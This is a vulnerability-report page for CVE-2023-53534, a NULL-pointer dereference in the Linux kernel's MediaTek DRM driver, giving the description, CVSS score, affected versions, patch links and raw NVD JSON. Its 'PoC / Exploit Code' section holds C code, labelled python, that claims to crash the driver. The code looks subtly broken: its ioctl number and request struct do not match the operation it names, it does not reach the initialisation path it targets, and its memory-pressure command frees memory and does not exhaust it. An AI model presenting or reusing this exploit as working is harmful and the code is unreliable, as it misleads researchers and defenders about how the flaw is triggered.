Security Vulnerability Report
中文
CVE-2023-53534 CVSS 5.5 MEDIUM

CVE-2023-53534

Published: 2025-10-04 16:15:48
Last Modified: 2026-03-25 00:36:57
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: mtk_drm_crtc: Add checks for devm_kcalloc As the devm_kcalloc may return NULL, the return value needs to be checked to avoid NULL poineter dereference.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5bf1e3bd7da625ccf9a22c8cb7d65271e6e47f4c
Linux kernel < 62952905e195f7350bc230cf0960a74ddbceed5d
Linux kernel < 67ea657c7891c2f86a7750395640d9bdf2555926
Linux kernel < 7d569ae98ee5490585929be69fea68047679b7b2
Linux kernel < b64b6dff15a38468b8cd33fc7864fa4e02b0933a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2023-53534 PoC - Trigger NULL pointer dereference in mtk_drm_crtc * This PoC demonstrates how to trigger the vulnerability by exhausting * memory conditions before loading the mediatek drm driver. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> /* Trigger the vulnerable code path by allocating DRM device resources */ int main(int argc, char *argv[]) { int fd; struct { unsigned int width; unsigned int height; unsigned int fourcc; unsigned int pitches[4]; unsigned int offsets[4]; unsigned int handles[4]; } __attribute__((packed)) create_req; /* Step 1: Open the DRM device for MediaTek */ fd = open("/dev/dri/card0", O_RDWR); if (fd < 0) { perror("Cannot open DRM device"); return -1; } /* Step 2: Try to create a framebuffer which triggers devm_kcalloc */ /* The vulnerable path is in mtk_drm_crtc driver initialization */ memset(&create_req, 0, sizeof(create_req)); create_req.width = 1920; create_req.height = 1080; create_req.fourcc = 0x34325258; /* DRM_FORMAT_XRGB8888 */ /* The vulnerability triggers when devm_kcalloc returns NULL * and the code does not check the return value */ if (ioctl(fd, /* DRM_IOCTL_MODE_CREATE_DUMB */ 0x4008642B, &create_req) < 0) { perror("ioctl failed - driver may have crashed"); } close(fd); return 0; } /* * Alternative trigger: Load the mediatek drm module under memory pressure * $ sudo bash -c 'echo 1 > /proc/sys/vm/drop_caches && modprobe mtk_drm' */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53534", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.340", "lastModified": "2026-03-25T00:36:57.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: mtk_drm_crtc: Add checks for devm_kcalloc\n\nAs the devm_kcalloc may return NULL, the return value needs to be checked\nto avoid NULL poineter dereference."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5bf1e3bd7da625ccf9a22c8cb7d65271e6e47f4c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/62952905e195f7350bc230cf0960a74ddbceed5d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/67ea657c7891c2f86a7750395640d9bdf2555926", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d569ae98ee5490585929be69fea68047679b7b2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b64b6dff15a38468b8cd33fc7864fa4e02b0933a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.